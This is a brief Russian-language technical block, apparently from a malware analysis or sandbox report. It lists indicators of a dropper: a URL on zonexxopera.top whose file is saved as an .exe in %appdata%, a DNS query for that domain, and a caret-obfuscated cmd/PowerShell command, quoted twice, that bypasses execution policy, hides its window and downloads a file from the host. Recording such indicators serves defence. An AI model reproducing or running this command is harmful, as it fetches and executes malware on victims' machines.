Техническая информация
- http://zonexxopera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^oWERS^HELL^.E^xE ^-^E^X^E^Cu^tio^NpOliCY byp^ASs -^NO^Profile^ -W^iN^dow^S^tYle hI^DdeN ^(^N^Ew-O^BJE^ct^ S^y^stEm.n^Et.^w^EB^CL^i^eNT).d^ow^n^l^O^AdfIlE^(^'http://zo...
- DNS ASK zo###xopera.top
- '<SYSTEM32>\cmd.exe' /c "P^oWERS^HELL^.E^xE ^-^E^X^E^Cu^tio^NpOliCY byp^ASs -^NO^Profile^ -W^iN^dow^S^tYle hI^DdeN ^(^N^Ew-O^BJE^ct^ S^y^stEm.n^Et.^w^EB^CL^i^eNT).d^ow^n^l^O^AdfIlE^(^'http://zo...' (со скрытым окном)